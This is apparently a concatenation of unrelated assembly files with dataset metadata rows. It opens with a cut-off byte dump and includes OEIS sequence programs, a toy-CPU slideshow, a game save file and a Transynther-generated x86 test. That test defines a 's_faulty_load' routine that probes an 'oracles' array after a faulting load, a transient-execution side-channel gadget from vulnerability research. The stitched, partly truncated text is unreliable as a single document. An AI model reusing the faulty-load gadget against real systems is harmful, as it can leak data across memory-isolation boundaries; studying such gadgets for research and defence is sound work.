58 58 58 58 58 58 58 58 58 58 58 58 58 00 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 00 00 58 58 58 58 58 58 58 58 00 00 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 00 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 00 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 00 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 00 58 58 58 58 58 58 00 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 00 58 58 58 58 58 58 58 00 58 58 58 58 58 58 58 58 58 58 00 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 00 58 00 58 58 58 00 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 00 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 00 58 58 58 58 58 58 58 00 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 00 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 00 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 00 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 00 52 58 58 58 58 58 58 58 58 58 58 58 58 58 58 00 58 58 58 58 00 58 58 58 58 58 00 00 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 00 00 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 00 58 58 58 58 58 58 00 00 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 00 58 58 58 58 58 00 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 00 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 00 58 58 58 58 58 00 58 58 58 58 58 58 58 58 58 58 58 58 58 58 00 58 58 58 58 58 58 58 58 58 58 58 58 58 58 00 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 00 58 58 58 58 00 58 58 58 00 58 58 58 58 58 58 58 58 00 00 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 00 58 58 58 58 58 58 58 58 00 58 58 58 58 58 58 00 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 00 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 00 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 00 00 58 58 00 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 00 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 00 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 00 58 58 58 00 58 58
*/
| 30.411184 | 2,999 | 0.653759 |
bbbc8cda22976932411d8092be90c938f12eeeb6 | 378 | asm | Assembly | programs/oeis/130/A130238.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 22 | 2018-02-06T19:19:31.000Z | 2022-01-17T21:53:31.000Z | programs/oeis/130/A130238.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 41 | 2021-02-22T19:00:34.000Z | 2021-08-28T10:47:47.000Z | programs/oeis/130/A130238.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 5 | 2021-02-24T21:14:16.000Z | 2021-08-09T19:48:05.000Z | ; A130238: Partial sums of A130237.
; 0,2,8,20,36,61,91,126,174,228,288,354,426,517,615,720,832,951,1077,1210,1350,1518,1694,1878,2070,2270,2478,2694,2918,3150,3390,3638,3894,4158,4464,4779,5103,5436,5778,6129,6489,6858,7236,7623,8019,8424,8838
lpb $0
mov $2,$0
sub $0,1
seq $2,130237 ; The 'lower' Fibonacci Inverse A130233(n) multiplied by n.
add $1,$2
lpe
mov $0,$1
| 34.363636 | 208 | 0.71164 |
6f9dd87599f81d5f60251ea035a1b33fd6cd96a9 | 2,476 | asm | Assembly | utils/pointless.asm | ring00/NaiveCPU | 3b719799ec1351e221bf242e4c5fc1f500322f5d | [
"MIT"
] | null | null | null | utils/pointless.asm | ring00/NaiveCPU | 3b719799ec1351e221bf242e4c5fc1f500322f5d | [
"MIT"
] | null | null | null | utils/pointless.asm | ring00/NaiveCPU | 3b719799ec1351e221bf242e4c5fc1f500322f5d | [
"MIT"
] | null | null | null | ; // A slide consists 80 * 30 = 2400 character
; // we will use 0x0100~0xBC7F to store at most 20 slides
; short* ptr;
; void print_to_screen() {
; short* current_ptr = ptr;
; short* current_mem = 0xF000;
; for (int i = 0; i < 0x1E; i++) { // 0x1E = 30
; for (int j = 0; j < 0x50; j++) { // 0x50 = 80
; short character = *current_ptr;
; *current_mem = character;
; current_ptr++;
; current_mem++;
; }
; current_mem += 0x30; // 0x30 = 48 = 128 - 80
; }
; }
; void prev() {
; if (ptr == 0x0100) {
; return;
; }
; ptr -= 0x960;
; print_to_screen();
; }
; void next() {
; if (ptr == 0xB320) { // 0x0100 + 19 * 2400 = 0xB320
; return;
; }
; ptr += 0x960;
; print_to_screen();
; }
; void test_keyboard() {
; }
; void start() {
; ptr = 0x0100;
; print_to_screen();
; while (1) {
; test_keyboard();
; short key = *(short*)0xBF02;
; if (key == 'a') {
; prev();
; }
; if (key == 'd') {
; next();
; }
; }
; }
START:
LI R0 0x1
SLL R0 R0 0x0 ; R0 = 0x0100
B PRINT_TO_SCREEN
NOP
LOOP:
MFPC R7
B TEST_KEYBOARD
ADDIU R7 0x2
LI R1 0xBF
SLL R1 R1 0x0 ; R1 = 0xBF00
LW R1 R2 0x2 ; R2 = *(short*)0xBF02
; Test 'A'
LI R1 0x41
CMP R1 R2
BTEQZ PREV
NOP
; Test 'D'
LI R1 0x44
CMP R1 R2
BTEQZ NEXT
NOP
B LOOP
NOP
TEST_KEYBOARD:
LI R1 0xBF
SLL R1 R1 0x0
LW R1 R2 0x3 ; R2 = *(short*)0xBF03
LI R1 0x1
AND R2 R1
BEQZ R2 TEST_KEYBOARD
NOP
JR R7
NOP
PREV:
LI R1 0x1
SLL R1 R1 0x0 ; R1 = 0x0100
CMP R0 R1
BTEQZ LOOP
LI R1 0x9
SLL R1 R1 0x0 ; R1 = 0x0900
ADDIU R1 0x60 ; R1 = 0x0960
SUBU R0 R1 R0 ; R0 -= 0x0960
B PRINT_TO_SCREEN
NOP
NEXT:
LI R1 0xB3
SLL R1 R1 0x0 ; R1 = 0xB300
ADDIU R1 0x20 ; R1 = 0xB320
CMP R0 R1
BTEQZ LOOP
LI R1 0x9
SLL R1 R1 0x0 ; R1 = 0x0900
ADDIU R1 0x60 ; R1 = 0x0960
ADDU R0 R1 R0 ; R0 += 0x960
B PRINT_TO_SCREEN
NOP
PRINT_TO_SCREEN:
ADDIU3 R0 R1 0x0 ; R1 = R0
LI R2 0xF0
SLL R2 R2 0x0 ; R2 = 0xF000
LI R3 0x1E ; R3 = 0x1E
OUTER:
LI R4 0x50 ; R4 = 0x50
INNER:
LW R1 R5 0x0
SW R2 R5 0x0
ADDIU R1 0x1
ADDIU R2 0x1
ADDIU R4 0xFF ; R4 = R4 - 1
BNEZ R4 INNER
NOP
ADDIU R2 0x30
ADDIU R3 0xFF ; R3 = R3 - 1
BNEZ R3 OUTER
NOP
B LOOP
NOP
| 17.81295 | 57 | 0.516559 |
bd80208a219fdb717a9ae8a7f4798247043ed07a | 7,384 | asm | Assembly | Transynther/x86/_processed/AVXALIGN/_st_/i7-7700_9_0xca.log_21829_355.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/AVXALIGN/_st_/i7-7700_9_0xca.log_21829_355.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/AVXALIGN/_st_/i7-7700_9_0xca.log_21829_355.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
push %r11
push %r12
push %r13
push %r15
push %r8
push %rcx
push %rdi
push %rdx
push %rsi
lea addresses_WT_ht+0x1923f, %r13
nop
nop
nop
nop
nop
inc %r15
mov (%r13), %r11
nop
xor $56523, %r13
lea addresses_D_ht+0xcbef, %rdx
nop
and $54509, %r8
mov (%rdx), %r12w
nop
and %r13, %r13
lea addresses_WT_ht+0x3cbf, %rsi
lea addresses_D_ht+0xfcbf, %rdi
nop
sub %r13, %r13
mov $14, %rcx
rep movsq
nop
nop
nop
add $47884, %rcx
lea addresses_normal_ht+0xd5cc, %rsi
lea addresses_UC_ht+0x1ea0f, %rdi
clflush (%rdi)
nop
nop
xor $4369, %r15
mov $13, %rcx
rep movsq
nop
nop
nop
nop
nop
add %rcx, %rcx
lea addresses_A_ht+0xa062, %rsi
lea addresses_A_ht+0x77ba, %rdi
nop
nop
nop
nop
and $51408, %r12
mov $28, %rcx
rep movsq
nop
nop
nop
nop
nop
sub %r12, %r12
lea addresses_A_ht+0x1b985, %r12
nop
xor $62567, %rdi
mov $0x6162636465666768, %rsi
movq %rsi, %xmm3
movups %xmm3, (%r12)
nop
nop
nop
nop
cmp $62399, %r8
lea addresses_WT_ht+0x1bda3, %r12
nop
nop
dec %r13
vmovups (%r12), %ymm4
vextracti128 $0, %ymm4, %xmm4
vpextrq $1, %xmm4, %rdx
nop
nop
add %r8, %r8
lea addresses_WC_ht+0x4cbf, %rsi
lea addresses_WC_ht+0x1efbf, %rdi
nop
nop
nop
nop
cmp $1071, %r15
mov $61, %rcx
rep movsb
nop
nop
nop
nop
add %rdx, %rdx
pop %rsi
pop %rdx
pop %rdi
pop %rcx
pop %r8
pop %r15
pop %r13
pop %r12
pop %r11
ret
.global s_faulty_load
s_faulty_load:
push %r10
push %r13
push %r8
push %r9
push %rbp
push %rcx
push %rsi
// Load
lea addresses_WC+0x10a3b, %r13
nop
nop
nop
nop
xor %r9, %r9
movb (%r13), %cl
nop
cmp $42347, %rbp
// Load
lea addresses_WC+0x13153, %r10
nop
cmp $35122, %r8
movups (%r10), %xmm4
vpextrq $1, %xmm4, %rcx
sub $21754, %r13
// Store
lea addresses_A+0x1b9bf, %r10
nop
nop
nop
nop
nop
cmp $56417, %r9
mov $0x5152535455565758, %rsi
movq %rsi, %xmm6
vmovups %ymm6, (%r10)
nop
xor %r13, %r13
// Store
lea addresses_normal+0x1347f, %r13
nop
nop
nop
nop
nop
cmp %r9, %r9
mov $0x5152535455565758, %r8
movq %r8, %xmm1
movntdq %xmm1, (%r13)
and $3450, %r13
// Load
lea addresses_WC+0xecbf, %r8
xor %rbp, %rbp
vmovaps (%r8), %ymm2
vextracti128 $1, %ymm2, %xmm2
vpextrq $0, %xmm2, %r9
sub $21438, %r10
// Faulty Load
lea addresses_PSE+0x1d4bf, %r9
xor %r8, %r8
mov (%r9), %rsi
lea oracles, %r9
and $0xff, %rsi
shlq $12, %rsi
mov (%r9,%rsi,1), %rsi
pop %rsi
pop %rcx
pop %rbp
pop %r9
pop %r8
pop %r13
pop %r10
ret
/*
<gen_faulty_load>
[REF]
{'src': {'congruent': 0, 'AVXalign': False, 'same': False, 'size': 32, 'NT': True, 'type': 'addresses_PSE'}, 'OP': 'LOAD'}
{'src': {'congruent': 1, 'AVXalign': False, 'same': False, 'size': 1, 'NT': False, 'type': 'addresses_WC'}, 'OP': 'LOAD'}
{'src': {'congruent': 2, 'AVXalign': False, 'same': False, 'size': 16, 'NT': False, 'type': 'addresses_WC'}, 'OP': 'LOAD'}
{'OP': 'STOR', 'dst': {'congruent': 6, 'AVXalign': False, 'same': False, 'size': 32, 'NT': False, 'type': 'addresses_A'}}
{'OP': 'STOR', 'dst': {'congruent': 6, 'AVXalign': False, 'same': False, 'size': 16, 'NT': True, 'type': 'addresses_normal'}}
{'src': {'congruent': 9, 'AVXalign': True, 'same': False, 'size': 32, 'NT': False, 'type': 'addresses_WC'}, 'OP': 'LOAD'}
[Faulty Load]
{'src': {'congruent': 0, 'AVXalign': True, 'same': True, 'size': 8, 'NT': False, 'type': 'addresses_PSE'}, 'OP': 'LOAD'}
<gen_prepare_buffer>
{'src': {'congruent': 7, 'AVXalign': False, 'same': False, 'size': 8, 'NT': False, 'type': 'addresses_WT_ht'}, 'OP': 'LOAD'}
{'src': {'congruent': 1, 'AVXalign': False, 'same': False, 'size': 2, 'NT': False, 'type': 'addresses_D_ht'}, 'OP': 'LOAD'}
{'src': {'congruent': 10, 'same': True, 'type': 'addresses_WT_ht'}, 'OP': 'REPM', 'dst': {'congruent': 10, 'same': False, 'type': 'addresses_D_ht'}}
{'src': {'congruent': 0, 'same': False, 'type': 'addresses_normal_ht'}, 'OP': 'REPM', 'dst': {'congruent': 1, 'same': False, 'type': 'addresses_UC_ht'}}
{'src': {'congruent': 0, 'same': False, 'type': 'addresses_A_ht'}, 'OP': 'REPM', 'dst': {'congruent': 0, 'same': False, 'type': 'addresses_A_ht'}}
{'OP': 'STOR', 'dst': {'congruent': 1, 'AVXalign': False, 'same': False, 'size': 16, 'NT': False, 'type': 'addresses_A_ht'}}
{'src': {'congruent': 2, 'AVXalign': False, 'same': False, 'size': 32, 'NT': False, 'type': 'addresses_WT_ht'}, 'OP': 'LOAD'}
{'src': {'congruent': 10, 'same': False, 'type': 'addresses_WC_ht'}, 'OP': 'REPM', 'dst': {'congruent': 8, 'same': False, 'type': 'addresses_WC_ht'}}
{'33': 21829}
33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33
*/
| 34.02765 | 2,999 | 0.654659 |
9debfa6167eb03bef89637fa48728e46eba297ea | 148 | asm | Assembly | libsrc/_DEVELOPMENT/arch/ts2068/display/c/sdcc/tshc_py2saddr.asm | jpoikela/z88dk | 7108b2d7e3a98a77de99b30c9a7c9199da9c75cb | [
"ClArtistic"
] | 640 | 2017-01-14T23:33:45.000Z | 2022-03-30T11:28:42.000Z | libsrc/_DEVELOPMENT/arch/ts2068/display/c/sdcc/tshc_py2saddr.asm | jpoikela/z88dk | 7108b2d7e3a98a77de99b30c9a7c9199da9c75cb | [
"ClArtistic"
] | 1,600 | 2017-01-15T16:12:02.000Z | 2022-03-31T12:11:12.000Z | libsrc/_DEVELOPMENT/arch/ts2068/display/c/sdcc/tshc_py2saddr.asm | jpoikela/z88dk | 7108b2d7e3a98a77de99b30c9a7c9199da9c75cb | [
"ClArtistic"
] | 215 | 2017-01-17T10:43:03.000Z | 2022-03-23T17:25:02.000Z | ; void *tshc_py2saddr(uchar y)
SECTION code_clib
SECTION code_arch
PUBLIC _tshc_py2saddr
EXTERN _zx_py2saddr
defc _tshc_py2saddr = _zx_py2saddr
| 13.454545 | 34 | 0.831081 |
6426fd46016ca362d8fe1cdefa08eb58d4e81455 | 401 | asm | Assembly | oeis/204/A204030.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/204/A204030.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/204/A204030.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A204030: Symmetric matrix based on f(i,j) = gcd(i+1, j+1), by antidiagonals.
; Submitted by Jon Maiga
; 2,1,1,2,3,2,1,1,1,1,2,1,4,1,2,1,3,1,1,3,1,2,1,2,5,2,1,2,1,1,1,1,1,1,1,1,2,3,4,1,6,1,4,3,2,1,1,1,1,1,1,1,1,1,1,2,1,2,1,2,7,2,1,2,1,2,1,3,1,5,3,1,1,3,5,1,3,1,2,1,4,1,2,1,8,1,2,1,4,1,2,1,1,1,1,1,1,1,1
lpb $0
add $1,1
sub $0,$1
mov $2,2
sub $2,$0
lpe
add $0,2
add $2,$1
gcd $2,$0
mov $0,$2
| 26.733333 | 199 | 0.546135 |
89240f2a1bd0a469efbe9c3165a897aba172a3e5 | 401 | asm | Assembly | oeis/192/A192338.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/192/A192338.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/192/A192338.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A192338: Constant term of the reduction of n-th polynomial at A157751 by x^2->x+2.
; Submitted by Christian Krause
; 1,2,6,18,54,166,514,1610,5078,16118,51394,164474,527798,1697254,5466498,17627370,56892246,183742358
mov $1,1
lpb $0
sub $0,1
mov $2,$1
add $1,$4
mul $3,2
sub $3,$4
mov $4,$2
mov $2,$3
mul $5,2
add $5,$4
mov $3,$5
add $4,$1
add $5,$2
lpe
add $5,$1
mov $0,$5
| 18.227273 | 101 | 0.630923 |
d9904366ad84147952c9940ba9880abd7216cbb4 | 6,290 | asm | Assembly | Games/banchorce/source/bancsav.asm | CiaranGruber/Ti-84-Calculator | 96742a4a2b9e21aa9d675575dc7e4f26365430c0 | [
"MIT"
] | 1 | 2019-03-31T11:49:12.000Z | 2019-03-31T11:49:12.000Z | Games/banchorce/source/bancsav.asm | CiaranGruber/Ti-84-Calculator | 96742a4a2b9e21aa9d675575dc7e4f26365430c0 | [
"MIT"
] | null | null | null | Games/banchorce/source/bancsav.asm | CiaranGruber/Ti-84-Calculator | 96742a4a2b9e21aa9d675575dc7e4f26365430c0 | [
"MIT"
] | 1 | 2020-03-09T13:21:19.000Z | 2020-03-09T13:21:19.000Z | ;---------------------------------------------------------------;
; ;
; Banchor ;
; Save Game File ;
; ;
;---------------------------------------------------------------;
;#define DEBUG_SAVE
#ifdef DEBUG_SAVE
; debugging save
difficulty: .db 1
mapNo: .db 9
playerDir: .db 0
enterMapCoords: .dl 60*256+44
hearts: .db 6
maxHearts: .db 12
gold: .dl 0
;items: .db 1,1,1,1,1,1,1,1,1,1,1,1
items: .db 1,0,0,0,0,0,0,0,0,0,0,0
;crystals: .db 1,1,1,1,1,1,1
crystals: .db 0,0,0,0,0,0,0
chests: .db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
.db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
.db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
.db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
.db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
.db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
.db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
.db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
.db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
.db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
.db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
.db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
changeList: .db 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255
.db 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255
.db 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255
.db 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255
.db 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255
.db 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255
.db 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255
.db 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255
.db 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255
.db 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255
.db 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255
.db 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255
#endif
; actual empty saves for release build
#ifndef DEBUG_SAVE
save1:
.dw 255,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
.dw 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
.dw 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
.dw 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
.dw 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
.dw 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
.db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
#endif
save2:
.dw 255,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
.dw 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
.dw 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
.dw 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
.dw 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
.dw 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
.db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
save3:
.dw 255,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
